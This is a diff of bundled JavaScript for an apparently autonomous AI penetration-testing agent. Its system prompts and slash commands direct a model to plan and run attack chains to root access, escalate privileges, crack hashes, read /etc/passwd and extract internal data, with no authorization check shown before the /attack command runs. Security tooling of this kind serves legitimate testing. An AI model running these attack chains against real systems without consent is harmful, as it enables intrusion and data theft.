+You are a senior penetration tester who designs comprehensive attack strategies.
+
+## Core Process
+
+**1. Finding Analysis**
+Review all reconnaissance findings. Understand the target architecture, services, and identified vulnerabilities.
+
+**2. Attack Vector Prioritization**
+Rank attack vectors by:
+- Likelihood of success (confidence score)
+- Impact if successful
+- Stealth/noise level
+- Dependencies and prerequisites
+
+**3. Attack Chain Design**
+Design complete attack chains from initial access to objective:
+- Initial access vector
+- Privilege escalation path
+- Lateral movement plan (if needed)
+- Objective achievement steps
+
+**4. Fallback Planning**
+For each attack, plan alternatives if it fails:
+- Alternative exploits
+- Different entry points
+- Pivot strategies
+
+## Output Format
+
+Deliver a decisive attack blueprint:
+
+- **Target Summary**: Key services, versions, identified vulnerabilities
+- **Primary Attack Chain**: Step-by-step exploitation plan
+- **Attack Vector Rankings**: Prioritized list with confidence scores (0-100)
+- **Exploit Selection**: Specific exploits/techniques for each step
+- **Prerequisites**: Tools, payloads, setup needed
+- **Fallback Options**: Alternative approaches if primary fails
+- **Risk Assessment**: Detection likelihood, cleanup needed
+
+Make confident decisions. Present ONE recommended plan with alternatives, not multiple equally-weighted options.
+
+## Confidence Scoring
+
+For each attack vector, assign confidence 0-100:
+- 90-100: Confirmed vulnerable, exploit tested
+- 75-89: Strong evidence of vulnerability
+- 50-74: Likely vulnerable based on version/config
+- 25-49: Possible but unconfirmed
+- 0-24: Theoretical only`
+};
+var FINDING_REVIEWER = {
+  name: "finding-reviewer",
+  description: "Validate and prioritize findings. Filter false positives, assign confidence scores.",
+  phase: "vuln-analysis",
+  tools: ["bash", "read"],
+  systemPrompt: `# Finding Reviewer
+
+Expert in vulnerability validation and false positive elimination.
+
+## Review Process
+
+1. **Categorize Finding**
+   - Is it a true vulnerability or misconfiguration?
+   - What is the attack vector?
+   - What is the potential impact?
+
+2. **Validate Evidence**
+   - Can we reproduce the finding?
+   - Is there concrete proof (error messages, response differences)?
+   - Could this be a false positive?
+
+3. **Assign Confidence Score**
+   - 90-100: Confirmed exploitable with proof
+   - 75-89: Strong evidence, should be exploitable
+   - 50-74: Likely vulnerable based on indicators
+   - 25-49: Possible but needs more confirmation
+   - 0-24: Unconfirmed, likely false positive
+
+4. **Risk Assessment**
+   - CVSS-like scoring
+   - Business impact consideration
+   - Exploitation difficulty
+
+## Validation Techniques
+
+### Web Vulnerabilities
+- SQLi: Error-based confirmation, UNION-based extraction
+- XSS: Payload execution in browser
+- LFI: Read known files (/etc/passwd)
+- RCE: Command execution confirmation (id, whoami)
+
+### Network Services
+- Version confirmation via banner
+- CVE applicability check
+- Exploit conditions verification
+
+## Output Format
+
+For each finding:
+\`\`\`
+Finding: [Title]
+Type: [Vulnerability Type]
+Confidence: [0-100]
+Severity: [Critical/High/Medium/Low/Info]
+Evidence: [Proof of vulnerability]
+Impact: [What an attacker could achieve]
+Recommendation: [How to exploit / remediate]
+\`\`\``
+};
+var BUILTIN_AGENTS = [
+  TARGET_EXPLORER,
+  EXPLOIT_RESEARCHER,
+  PRIVESC_MASTER,
+  WEB_HACKER,
+  CRYPTO_SOLVER,
+  FORENSICS_ANALYST,
+  REVERSE_ENGINEER,
+  ATTACK_ARCHITECT,
+  FINDING_REVIEWER
+];
+function getAgentByName(name) {
+  return BUILTIN_AGENTS.find((a) => a.name === name);
+}
+function buildAgentSystemPrompt(basePrompt, agent) {
+  return `${basePrompt}
+
+---
+
+## Specialized Agent: ${agent.name}
+
+${agent.systemPrompt}`;
+}
+
+// src/commands/index.ts
+var SCAN_COMMAND = {
+  name: "scan",
+  description: "Quick target enumeration",
+  usage: "/scan <target>",
+  aliases: ["s", "enum"],
+  execute: async (args, context) => {
+    const target = args[0] || context.target;
+    if (!target) {
+      return { success: false, output: "Usage: /scan <target>" };
+    }
+    const scanPrompt = `Perform quick enumeration on ${target}:
+1. Port scan top 1000 ports
+2. Service version detection on open ports
+3. Web directory enumeration if HTTP/HTTPS detected
+4. List top 5 interesting findings
+
+Be concise but thorough.`;
+    try {
+      const result = await context.agent.chat(scanPrompt);
+      return { success: true, output: result };
+    } catch (error) {
+      return { success: false, output: `Scan failed: ${error.message}` };
+    }
+  }
+};
+var EXPLOIT_COMMAND = {
+  name: "exploit",
+  description: "Search for exploits and optionally execute",
+  usage: "/exploit <service> [version]",
+  aliases: ["exp", "x"],
+  execute: async (args, context) => {
+    if (args.length === 0) {
+      return { success: false, output: "Usage: /exploit <service> [version]" };
+    }
+    const query = args.join(" ");
+    const exploitPrompt = `Search for exploits: ${query}
+
+1. Search exploit-db via searchsploit
+2. Check CVE databases
+3. List available Metasploit modules
+4. For each exploit found, rate likelihood of success (0-100)
+
+Return top 3 most promising exploits with:
+- CVE/EDB ID
+- Type (RCE, LFI, SQLi, etc.)
+- Success probability
+- Required conditions`;
+    try {
+      const result = await context.agent.chat(exploitPrompt);
+      return { success: true, output: result };
+    } catch (error) {
+      return { success: false, output: `Exploit search failed: ${error.message}` };
+    }
+  }
+};
+var PRIVESC_COMMAND = {
+  name: "privesc",
+  description: "Check for privilege escalation vectors",
+  usage: "/privesc [linux|windows]",
+  aliases: ["pe", "priv"],
+  execute: async (args, context) => {
+    const os = args[0]?.toLowerCase() || "linux";
+    const privescPrompt = os === "windows" ? `Check for Windows privilege escalation vectors:
+1. whoami /priv - check privileges
+2. Check for unquoted service paths
+3. Check AlwaysInstallElevated
+4. Look for stored credentials
+5. Check scheduled tasks
+6. Look for writable service binaries
+
+For each vector found, rate exploitability (0-100) and provide exploitation steps.` : `Check for Linux privilege escalation vectors:
+1. sudo -l - check sudo permissions
+2. find SUID binaries
+3. Check capabilities
+4. Review cron jobs
+5. Check kernel version
+6. Look for writable sensitive files
+
+For each vector found, rate exploitability (0-100) and provide GTFOBins/exploitation steps.`;
+    try {
+      const result = await context.agent.chat(privescPrompt);
+      return { success: true, output: result };
+    } catch (error) {
+      return { success: false, output: `Privesc check failed: ${error.message}` };
+    }
+  }
+};
+var VULN_REVIEW_COMMAND = {
+  name: "vuln-review",
+  description: "Review and prioritize all findings",
+  usage: "/vuln-review",
+  aliases: ["review", "findings"],
+  execute: async (_args, context) => {
+    const state = context.agent.getState();
+    const findings = state.findings || [];
+    if (findings.length === 0) {
+      return { success: true, output: "No findings to review. Run /scan first." };
+    }
+    const reviewPrompt = `Review the following ${findings.length} findings and prioritize:
+
+${findings.map((f, i) => `${i + 1}. [${f.severity}] ${f.title}: ${f.description}`).join("\n")}
+
+For each finding:
+1. Validate if it's a true positive
+2. Adjust confidence score if needed
+3. Prioritize by exploitability
+
+Return prioritized attack plan.`;
+    try {
+      const result = await context.agent.chat(reviewPrompt);
+      return { success: true, output: result };
+    } catch (error) {
+      return { success: false, output: `Review failed: ${error.message}` };
+    }
+  }
+};
+var ATTACK_COMMAND = {
+  name: "attack",
+  description: "Execute attack chain on target",
+  usage: "/attack <objective>",
+  aliases: ["pwn", "hack"],
+  execute: async (args, context) => {
+    const objective = args.join(" ") || "Gain root/SYSTEM access";
+    const target = context.target || context.agent.getState().target?.primary;
+    if (!target) {
+      return { success: false, output: "No target set. Use /target first." };
+    }
+    const attackPrompt = `Execute attack chain on ${target}
+Objective: ${objective}
+
+1. Review current findings and access level
+2. Select best attack vector
+3. Execute exploitation
+4. Escalate privileges if needed
+5. Achieve objective
+
+Be autonomous but log every step. If something fails, try alternative approaches.`;
+    try {
+      await context.agent.runAutonomous(attackPrompt);
+      return { success: true, output: "Attack chain complete." };
+    } catch (error) {
+      return { success: false, output: `Attack failed: ${error.message}` };
+    }
+  }
+};
+var REPORT_COMMAND = {
+  name: "report",
+  description: "Generate penetration testing report",
+  usage: "/report [format]",
+  aliases: ["rep"],
+  execute: async (_args, context) => {
+    const state = context.agent.getState();
+    const reportPrompt = `Generate a penetration testing report:
+
+## Executive Summary
+Brief overview of the engagement.
+
+## Scope
+Target: ${state.target?.primary || "Unknown"}
+
+## Findings Summary
+${state.findings?.length || 0} vulnerabilities identified.
+
+## Detailed Findings
+${state.findings?.map((f) => `- [${f.severity}] ${f.title}`).join("\n") || "None"}
+
+## Credentials Obtained
+${state.credentials?.length || 0} credentials
+
+## Hosts Compromised
+${state.compromisedHosts?.join(", ") || "None"}
+
+## Attack Path
+Describe the successful attack chain.
+
+## Recommendations
+Prioritized remediation steps.
+
+Format as markdown.`;
+    try {
+      const result = await context.agent.chat(reportPrompt);
+      return { success: true, output: result };
+    } catch (error) {
+      return { success: false, output: `Report generation failed: ${error.message}` };
+    }
   }
-  // Disconnect all
-  async disconnectAll() {
-    for (const client of this.clients.values()) {
-      await client.disconnect();
+};
+var WEB_COMMAND = {
+  name: "web",
+  description: "Web application security testing",
+  usage: "/web <url>",
+  aliases: ["webapp"],
+  execute: async (args, context) => {
+    const url = args[0];
+    if (!url) {
+      return { success: false, output: "Usage: /web <url>" };
+    }
+    const webPrompt = `Perform web application security testing on ${url}:
+
+1. Technology fingerprinting (Wappalyzer, whatweb)
+2. Directory enumeration
+3. SQLi testing on parameters
+4. XSS testing on inputs
+5. Authentication testing
+6. Look for sensitive files (robots.txt, .git, .env)
+
+For each vulnerability found, provide:
+- Type
+- Proof of concept
+- Impact
+- Confidence score`;
+    try {
+      const result = await context.agent.chat(webPrompt);
+      return { success: true, output: result };
+    } catch (error) {
+      return { success: false, output: `Web testing failed: ${error.message}` };
     }
-    this.clients.clear();
-    this.tools.clear();
   }
 };
-var mcpManager = null;
-function getMCPManager() {
-  if (!mcpManager) {
-    mcpManager = new MCPManager();
-  }
-  return mcpManager;
-}
+var HASH_COMMAND = {
+  name: "hash",
+  description: "Identify and crack hashes",
+  usage: "/hash <hash>",
+  aliases: ["crack"],
+  execute: async (args, context) => {
+    const hash = args[0];
+    if (!hash) {
+      return { success: false, output: "Usage: /hash <hash>" };
+    }
+    const hashPrompt = `Analyze and crack this hash: ${hash}
 
-// src/core/tools/web-search.ts
-import { spawn as spawn4 } from "child_process";
-async function searchDuckDuckGo(query, options = {}) {
-  const { maxResults = 10, timeout = 3e4 } = options;
-  return new Promise((resolve2) => {
-    const url = `https://html.duckduckgo.com/html/?q=${encodeURIComponent(query)}`;
-    const proc = spawn4("curl", [
-      "-s",
-      "-A",
-      "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
-      url
-    ], { timeout });
-    let stdout = "";
-    proc.stdout.on("data", (data) => {
-      stdout += data.toString();
-    });
-    proc.on("close", () => {
-      const results = [];
-      const resultRegex = /<a[^>]+class="result__a"[^>]+href="([^"]+)"[^>]*>([^<]+)<\/a>/g;
-      const snippetRegex = /<a[^>]+class="result__snippet"[^>]*>([^<]+)<\/a>/g;
-      let match;
-      const urls = [];
-      const titles = [];
-      const snippets = [];
-      while ((match = resultRegex.exec(stdout)) !== null) {
-        urls.push(match[1]);
-        titles.push(match[2]);
-      }
-      while ((match = snippetRegex.exec(stdout)) !== null) {
-        snippets.push(match[1]);
-      }
-      for (let i = 0; i < Math.min(urls.length, maxResults); i++) {
-        results.push({
-          title: titles[i] || "",
-          url: urls[i] || "",
-          snippet: snippets[i] || ""
-        });
-      }
-      resolve2(results);
-    });
-    proc.on("error", () => {
-      resolve2([]);
-    });
-  });
-}
-async function searchCVE(query) {
-  return searchDuckDuckGo(`${query} site:cve.mitre.org OR site:nvd.nist.gov`);
+1. Identify hash type (hashid, hash-identifier)
+2. Determine hashcat mode
+3. Attempt cracking with rockyou.txt
+4. If not cracked, suggest more wordlists or rules
+
+Report: hash type, cracked password (if successful), or recommendations.`;
+    try {
+      const result = await context.agent.chat(hashPrompt);
+      return { success: true, output: result };
+    } catch (error) {
+      return { success: false, output: `Hash cracking failed: ${error.message}` };
+    }
+  }
+};
+var BUILTIN_COMMANDS = [
+  SCAN_COMMAND,
+  EXPLOIT_COMMAND,
+  PRIVESC_COMMAND,
+  VULN_REVIEW_COMMAND,
+  ATTACK_COMMAND,
+  REPORT_COMMAND,
+  WEB_COMMAND,
+  HASH_COMMAND
+];
+function getCommandByName(name) {
+  return BUILTIN_COMMANDS.find(
+    (c) => c.name === name || c.aliases?.includes(name)
+  );
 }
-async function searchExploits(query) {
-  return searchDuckDuckGo(`${query} site:exploit-db.com OR site:github.com exploit`);
+async function executeCommand(name, args, context) {
+  const command = getCommandByName(name);
+  if (!command) {
+    return { success: false, output: `Unknown command: ${name}` };
+  }
+  return command.execute(args, context);
 }
 
 // src/core/agent/autonomous-agent.ts
@@ -2033,12 +2963,12 @@ var AutonomousHackingAgent = class extends EventEmitter3 {
   state;
   config;
   tools;
-  pluginAgents = [];
+  builtinAgents = BUILTIN_AGENTS;
   currentAgent = null;
   // Integrated systems
   hookExecutor;
-  commandRegistry;
   mcpManager;
+  contextManager;
   // Rabbit hole detection settings
   STUCK_THRESHOLD = 5;
   // Same action repeat count
@@ -2049,33 +2979,46 @@ var AutonomousHackingAgent = class extends EventEmitter3 {
   constructor(apiKey, config) {
     super();
     this.client = new Anthropic({
-      apiKey: apiKey || process.env.ANTHROPIC_API_KEY
+      apiKey: apiKey || process.env.ANTHROPIC_API_KEY,
+      baseURL: ANTHROPIC_BASE_URL
     });
     this.config = { ...AGENT_CONFIG, ...config };
     this.tools = ALL_TOOLS;
     this.hookExecutor = getHookExecutor();
-    this.commandRegistry = getCommandRegistry();
     this.mcpManager = getMCPManager();
+    this.contextManager = new ContextManager(this.client);
     this.state = this.createInitialState();
-    this.initPlugins();
+    this.initSystems();
   }
-  // Initialize plugin system
-  async initPlugins() {
+  // Initialize systems (hooks, MCP)
+  async initSystems() {
     try {
-      const agentsDir = new URL("../../../../plugins/pentesting-core/agents", import.meta.url).pathname;
-      this.pluginAgents = await loadAllAgents(agentsDir);
-      this.emit(AGENT_EVENT.PLUGINS_LOADED, { agents: this.pluginAgents.length });
+      this.emit(AGENT_EVENT.PLUGINS_LOADED, { agents: this.builtinAgents.length });
       await this.hookExecutor.initialize();
       this.emit(AGENT_EVENT.HOOKS_LOADED);
-      await this.commandRegistry.initialize();
-      this.emit(AGENT_EVENT.COMMANDS_LOADED);
+      this.emit(AGENT_EVENT.COMMANDS_LOADED, { commands: BUILTIN_COMMANDS.length });
     } catch {
     }
   }
-  // Add MCP server at runtime
+  // Add MCP server at runtime and integrate its tools
   async addMCPServer(name, command, args) {
     await this.mcpManager.addServer(name, { command, args });
-    this.emit(AGENT_EVENT.MCP_SERVER_ADDED, { name });
+    const mcpTools = this.mcpManager.getAvailableTools();
+    for (const mcpTool of mcpTools) {
+      const anthropicTool = {
+        name: mcpTool.name,
+        description: mcpTool.description,
+        input_schema: mcpTool.inputSchema
+      };
+      if (!this.tools.find((t) => t.name === mcpTool.name)) {
+        this.tools.push(anthropicTool);
+      }
+    }
+    this.emit(AGENT_EVENT.MCP_SERVER_ADDED, { name, toolCount: mcpTools.length });
+  }
+  // Get all MCP tools
+  getMCPTools() {
+    return this.mcpManager.getAvailableTools().map((t) => t.name);
   }
   // Web search capabilities
   async webSearch(query) {
@@ -2096,35 +3039,37 @@ var AutonomousHackingAgent = class extends EventEmitter3 {
     this.think(THOUGHT_TYPE.RESULT, `Found ${results.length} exploit results`);
     return results;
   }
-  // Process slash command
+  // Process slash command using built-in commands
   async processCommand(input) {
-    const parsed = parseCommand(input);
-    if (!parsed) return null;
-    const cmd = await this.commandRegistry.getCommand(parsed.command);
-    if (!cmd) {
-      return `Unknown command: /${parsed.command}
-${await this.commandRegistry.getHelp()}`;
-    }
-    this.think(THOUGHT_TYPE.PLAN, `Executing command: /${cmd.name}`);
-    this.emit(AGENT_EVENT.COMMAND_EXECUTE, { command: cmd.name, args: parsed.rawArgs });
-    return cmd.content;
-  }
-  // Switch to specialized agent
+    if (!input.startsWith("/")) return null;
+    const parts = input.slice(1).split(" ");
+    const cmdName = parts[0];
+    const args = parts.slice(1);
+    const context = {
+      agent: this,
+      target: this.state.target.primary
+    };
+    const result = await executeCommand(cmdName, args, context);
+    this.think(THOUGHT_TYPE.PLAN, `Executed command: /${cmdName}`);
+    this.emit(AGENT_EVENT.COMMAND_EXECUTE, { command: cmdName, args });
+    return result.output;
+  }
+  // Switch to specialized built-in agent
   async useAgent(agentName) {
-    const agent = this.pluginAgents.find(
+    const agent = this.builtinAgents.find(
       (a) => a.name === agentName || a.name === agentName.replace(/-/g, "_") || a.name.includes(agentName)
     );
     if (agent) {
       this.currentAgent = agent;
       this.think(THOUGHT_TYPE.PLAN, `Switching to specialized agent: ${agent.name}`);
-      this.emit(AGENT_EVENT.AGENT_SWITCH, agent);
+      this.emit(AGENT_EVENT.AGENT_SWITCH, { name: agent.name, description: agent.description });
       return true;
     }
     return false;
   }
   // Get available agents
   getAvailableAgents() {
-    return this.pluginAgents.map((a) => a.name);
+    return this.builtinAgents.map((a) => a.name);
   }
   // ===== State Management =====
   createInitialState() {
@@ -2142,6 +3087,8 @@ ${await this.commandRegistry.getHelp()}`;
       phases: DEFAULT_PHASES.map((p) => ({ ...p, findings: [], notes: [] })),
       thoughts: [],
       findings: [],
+      credentials: [],
+      compromisedHosts: [],
       iteration: 0,
       fullAttempts: 0,
       successfulExploits: 0,
@@ -2207,11 +3154,38 @@ ${await this.commandRegistry.getHelp()}`;
       this.state.currentPhase = nextPhase.id;
       this.setPhaseStatus(nextPhase.id, PHASE_STATUS.IN_PROGRESS);
       this.think(THOUGHT_TYPE.PLAN, `Advancing to next phase: ${nextPhase.shortName}`);
+      this.autoSwitchAgentForPhase(nextPhase.id);
       this.resetStuckCounter();
       return true;
     }
     return false;
   }
+  /**
+   * Automatically switch to the best agent for the current phase
+   */
+  autoSwitchAgentForPhase(phaseId) {
+    const phaseToAgentMap = {
+      [PHASE_ID.RECON]: "target-explorer",
+      [PHASE_ID.SCAN]: "target-explorer",
+      [PHASE_ID.ENUM]: "target-explorer",
+      [PHASE_ID.VULN]: "exploit-researcher",
+      [PHASE_ID.EXPLOIT]: "exploit-researcher",
+      [PHASE_ID.PRIVESC]: "privesc-master",
+      [PHASE_ID.PIVOT]: "privesc-master",
+      [PHASE_ID.PERSIST]: "privesc-master",
+      [PHASE_ID.EXFIL]: "forensics-analyst",
+      [PHASE_ID.REPORT]: "finding-reviewer"
+    };
+    const agentName = phaseToAgentMap[phaseId];
+    if (agentName) {
+      const agent = getAgentByName(agentName);
+      if (agent) {
+        this.currentAgent = agent;
+        this.emit(AGENT_EVENT.AGENT_SWITCH, { name: agent.name, description: agent.description });
+        this.think(THOUGHT_TYPE.OBSERVATION, `Switched to ${agent.name} agent for ${phaseId} phase`);
+      }
+    }
+  }
   // ===== Rabbit Hole Detection =====
   checkIfStuck() {
     const currentPhase = this.getCurrentPhase();
@@ -2324,6 +3298,7 @@ What went wrong and what different approach should be tried?
     }
     this.state.status = AGENT_STATUS.RUNNING;
     this.setPhaseStatus(PHASE_ID.RECON, PHASE_STATUS.IN_PROGRESS);
+    this.autoSwitchAgentForPhase(PHASE_ID.RECON);
     const mainObjective = objective || `
 Target ${this.state.target.primary} - performing full penetration test.
 Goal: Deep penetration to obtain root/system privileges, extract internal data, map entire network.
@@ -2380,6 +3355,22 @@ Goal: Deep penetration to obtain root/system privileges, extract internal data,
   async executeStep() {
     const contextPrompt = this.buildContextPrompt();
     this.think(THOUGHT_TYPE.PLAN, "Deciding next action...");
+    const contextStatus = this.contextManager.checkStatus(this.state.history);
+    if (contextStatus.warning) {
+      this.think(THOUGHT_TYPE.OBSERVATION, `Context at ${(contextStatus.percentage * 100).toFixed(1)}% capacity`);
+    }
+    if (contextStatus.needsCompaction) {
+      this.think(THOUGHT_TYPE.PLAN, "Compacting context...");
+      const compactResult = await this.contextManager.compactIfNeeded(this.state.history);
+      if (compactResult.wasCompacted && compactResult.result) {
+        this.state.history = compactResult.messages;
+        this.emit(AGENT_EVENT.CONTEXT_COMPACTED, compactResult.result);
+        this.think(
+          THOUGHT_TYPE.OBSERVATION,
+          `Context compacted: ${compactResult.result.compactionRatio.toFixed(2)}x reduction`
+        );
+      }
+    }
     const historyMessages = this.state.history.map(toMessageParam);
     const messages = [
       ...historyMessages,
@@ -2387,15 +3378,26 @@ Goal: Deep penetration to obtain root/system privileges, extract internal data,
     ];
     let systemPrompt = AUTONOMOUS_HACKING_PROMPT;
     if (this.currentAgent) {
-      systemPrompt = buildAgentPrompt(this.currentAgent, systemPrompt);
+      systemPrompt = buildAgentSystemPrompt(systemPrompt, this.currentAgent);
     }
-    const response = await this.client.messages.create({
-      model: CLAUDE_MODEL,
-      max_tokens: CLAUDE_MAX_TOKENS,
-      system: systemPrompt,
-      tools: this.tools,
-      messages
-    });
+    const response = await withRetry(
+      () => this.client.messages.create({
+        model: CLAUDE_MODEL,
+        max_tokens: CLAUDE_MAX_TOKENS,
+        system: systemPrompt,
+        tools: this.tools,
+        messages
+      }),
+      {
+        maxRetries: 3,
+        onRetry: (attempt, error, delay) => {
+          this.think(
+            THOUGHT_TYPE.STUCK,
+            `API retry ${attempt}/3 after ${delay}ms: ${error.message}`
+          );
+        }
+      }
+    );
     return this.processResponse(response);
   }
   buildContextPrompt() {
@@ -2449,7 +3451,13 @@ Use report_finding tool for important discoveries.
         this.trackAction(actionKey);
         this.think(THOUGHT_TYPE.ACTION, `[tool] Tool execution: ${toolName}`);
         this.emit(AGENT_EVENT.TOOL_CALL, { id: block.id, name: toolName, input: toolInput });
+        const hookCheck = await this.hookExecutor.checkPreToolUse(toolName, toolInput);
+        if (hookCheck.decision === "block") {
+          this.think(THOUGHT_TYPE.STUCK, `Tool blocked by hook: ${hookCheck.output}`);
+          continue;
+        }
         const result = await executeToolCall(toolName, toolInput);
+        await this.hookExecutor.runPostToolUse(toolName, result.output || "");
         const resultType = result.success ? "result" : "result";
         this.think(
           resultType,
@@ -2648,6 +3656,100 @@ ${this.state.findings.filter((f) => f.severity !== "info").map((f) => `- Address
     this.resetStuckCounter();
     this.emit(AGENT_EVENT.HINT_RECEIVED, hint);
   }
+  // ===== Interactive Chat =====
+  /**
+   * Process user chat message and generate AI response
+   * This is the main method for interactive TUI conversations
+   */
+  async chat(userMessage) {
+    this.think(THOUGHT_TYPE.PLAN, `Processing: ${userMessage}`);
+    this.state.history.push({
+      role: "user",
+      content: userMessage
+    });
+    try {
+      const systemPrompt = this.buildContextualPrompt();
+      const response = await this.client.messages.create({
+        model: CLAUDE_MODEL,
+        max_tokens: CLAUDE_MAX_TOKENS,
+        system: systemPrompt,
+        messages: this.state.history,
+        tools: this.tools
+      });
+      let textResponse = "";
+      let hasToolCalls = false;
+      for (const block of response.content) {
+        if (block.type === "text") {
+          textResponse += block.text;
+          this.emit(AGENT_EVENT.RESPONSE, block.text);
+        } else if (block.type === "tool_use") {
+          hasToolCalls = true;
+          this.emit(AGENT_EVENT.TOOL_CALL, { name: block.name, input: block.input });
+          const result = await executeToolCall(block.name, block.input);
+          this.emit(AGENT_EVENT.TOOL_RESULT, { name: block.name, result });
+          this.state.history.push({
+            role: "assistant",
+            content: response.content
+          });
+          this.state.history.push({
+            role: "user",
+            content: [{
+              type: "tool_result",
+              tool_use_id: block.id,
+              content: typeof result === "string" ? result : JSON.stringify(result)
+            }]
+          });
+        }
+      }
+      if (hasToolCalls && response.stop_reason === "tool_use") {
+        const followUp = await this.client.messages.create({
+          model: CLAUDE_MODEL,
+          max_tokens: CLAUDE_MAX_TOKENS,
+          system: systemPrompt,
+          messages: this.state.history,
+          tools: this.tools
+        });
+        for (const block of followUp.content) {
+          if (block.type === "text") {
+            textResponse += block.text;
+            this.emit(AGENT_EVENT.RESPONSE, block.text);
+          }
+        }
+        this.state.history.push({
+          role: "assistant",
+          content: followUp.content
+        });
+      } else if (!hasToolCalls) {
+        this.state.history.push({
+          role: "assistant",
+          content: textResponse
+        });
+      }
+      this.think(THOUGHT_TYPE.RESULT, "Response generated");
+      return textResponse;
+    } catch (error) {
+      const errMsg = error instanceof Error ? error.message : "Unknown error";
+      this.emit(AGENT_EVENT.ERROR, error);
+      this.think(THOUGHT_TYPE.STUCK, `Error: ${errMsg}`);
+      return `Error: ${errMsg}`;
+    }
+  }
+  /**
+   * Build a context-aware prompt for chat interactions
+   */
+  buildContextualPrompt() {
+    const targetInfo = this.state.target.primary ? `Current target: ${this.state.target.primary}` : "No target set";
+    const phaseInfo = `Current phase: ${this.state.currentPhase}`;
+    const findingsInfo = `Findings so far: ${this.state.findings.length}`;
+    return `You are an autonomous penetration testing AI assistant.
+${targetInfo}
+${phaseInfo}  
+${findingsInfo}
+
+Available tools: ${this.tools.map((t) => t.name).join(", ")}
+
+Respond helpfully to the user's message. If they ask to perform security testing actions, use the appropriate tools. Always explain what you're doing and why.`;
+  }
   // ===== Pause/Resume =====
   pause() {
     this.state.status = AGENT_STATUS.PAUSED;
@@ -2664,7 +3766,430 @@ ${this.state.findings.filter((f) => f.severity !== "info").map((f) => `- Address
     this.state = this.createInitialState();
     this.emit(AGENT_EVENT.RESET);
   }
+  // ===== Integration Methods =====
+  /**
+   * Get the system prompt for external streaming
+   */
+  getSystemPrompt() {
+    let systemPrompt = AUTONOMOUS_HACKING_PROMPT;
+    if (this.currentAgent) {
+      systemPrompt = buildAgentSystemPrompt(systemPrompt, this.currentAgent);
+    }
+    return systemPrompt;
+  }
+  /**
+   * Get tools array for external use
+   */
+  getTools() {
+    return this.tools;
+  }
+  /**
+   * Execute a tool directly (for streaming integration)
+   */
+  async executeToolDirect(toolName, toolInput) {
+    this.think(THOUGHT_TYPE.ACTION, `Executing tool: ${toolName}`);
+    const hookResult = await this.hookExecutor.checkPreToolUse(toolName, toolInput);
+    if (hookResult.decision === "block") {
+      this.think(THOUGHT_TYPE.OBSERVATION, `Tool blocked by hook: ${hookResult.reason}`);
+      return {
+        success: false,
+        output: `Tool blocked: ${hookResult.reason}`,
+        duration: 0
+      };
+    }
+    const result = await executeToolCall(toolName, toolInput);
+    await this.hookExecutor.runPostToolUse(toolName, result.output);
+    this.think(THOUGHT_TYPE.RESULT, `Tool ${toolName} result: ${result.output.substring(0, 200)}...`);
+    this.emit(AGENT_EVENT.TOOL_RESULT, { name: toolName, result });
+    return result;
+  }
+  /**
+   * Get history for session persistence
+   */
+  getHistory() {
+    return this.state.history;
+  }
+  /**
+   * Get all findings
+   */
+  getFindings() {
+    return this.state.findings;
+  }
+  /**
+   * Get credentials
+   */
+  getCredentials() {
+    return this.state.credentials;
+  }
+  /**
+   * Get compromised hosts
+   */
+  getCompromisedHosts() {
+    return this.state.compromisedHosts;
+  }
+};
+
+// src/core/session/session-manager.ts
+import * as fs3 from "fs/promises";
+import * as path3 from "path";
+import { EventEmitter as EventEmitter4 } from "events";
+var SESSIONS_DIR = ".pentesting/sessions";
+function generateSessionId() {
+  const timestamp = Date.now().toString(36);
+  const random = Math.random().toString(36).substring(2, 8);
+  return `session_${timestamp}_${random}`;
+}
+var SessionManager = class extends EventEmitter4 {
+  sessionsDir;
+  currentSession = null;
+  constructor(baseDir) {
+    super();
+    this.sessionsDir = path3.join(baseDir || process.cwd(), SESSIONS_DIR);
+  }
+  /**
+   * Initialize sessions directory
+   */
+  async initialize() {
+    try {
+      await fs3.mkdir(this.sessionsDir, { recursive: true });
+    } catch {
+    }
+  }
+  /**
+   * Create a new session
+   */
+  async createSession(objective, target) {
+    await this.initialize();
+    const now = (/* @__PURE__ */ new Date()).toISOString();
+    const metadata = {
+      id: generateSessionId(),
+      createdAt: now,
+      updatedAt: now,
+      objective,
+      target,
+      currentPhase: "reconnaissance",
+      status: "active"
+    };
+    this.currentSession = metadata;
+    const sessionDir = path3.join(this.sessionsDir, metadata.id);
+    await fs3.mkdir(sessionDir, { recursive: true });
+    await this.saveMetadata(metadata);
+    this.emit("session_created", metadata);
+    return metadata;
+  }
+  /**
+   * Save session metadata
+   */
+  async saveMetadata(metadata) {
+    const metadataPath = path3.join(this.sessionsDir, metadata.id, "metadata.json");
+    await fs3.writeFile(metadataPath, JSON.stringify(metadata, null, 2));
+  }
+  /**
+   * Save full session snapshot
+   */
+  async saveSnapshot(snapshot) {
+    if (!this.currentSession) {
+      throw new Error("No active session");
+    }
+    const sessionDir = path3.join(this.sessionsDir, this.currentSession.id);
+    this.currentSession.updatedAt = (/* @__PURE__ */ new Date()).toISOString();
+    this.currentSession.currentPhase = snapshot.state.currentPhase;
+    await this.saveMetadata(this.currentSession);
+    const statePath = path3.join(sessionDir, "state.json");
+    await fs3.writeFile(statePath, JSON.stringify(snapshot.state, null, 2));
+    const configPath = path3.join(sessionDir, "config.json");
+    await fs3.writeFile(configPath, JSON.stringify(snapshot.config, null, 2));
+    const historyPath = path3.join(sessionDir, "history.jsonl");
+    const historyLine = JSON.stringify({
+      timestamp: this.currentSession.updatedAt,
+      iteration: snapshot.state.iteration,
+      phase: snapshot.state.currentPhase
+    }) + "\n";
+    await fs3.appendFile(historyPath, historyLine);
+    this.emit("snapshot_saved", this.currentSession.id);
+  }
+  /**
+   * Load a session by ID
+   */
+  async loadSession(sessionId) {
+    try {
+      const sessionDir = path3.join(this.sessionsDir, sessionId);
+      const metadataPath = path3.join(sessionDir, "metadata.json");
+      const metadataContent = await fs3.readFile(metadataPath, "utf-8");
+      const metadata = JSON.parse(metadataContent);
+      const statePath = path3.join(sessionDir, "state.json");
+      const stateContent = await fs3.readFile(statePath, "utf-8");
+      const state = JSON.parse(stateContent);
+      const configPath = path3.join(sessionDir, "config.json");
+      let config = {};
+      try {
+        const configContent = await fs3.readFile(configPath, "utf-8");
+        config = JSON.parse(configContent);
+      } catch {
+      }
+      this.currentSession = metadata;
+      this.emit("session_loaded", metadata);
+      return { metadata, state, config };
+    } catch {
+      return null;
+    }
+  }
+  /**
+   * List all sessions
+   */
+  async listSessions() {
+    await this.initialize();
+    try {
+      const entries = await fs3.readdir(this.sessionsDir, { withFileTypes: true });
+      const sessions = [];
+      for (const entry of entries) {
+        if (entry.isDirectory()) {
+          try {
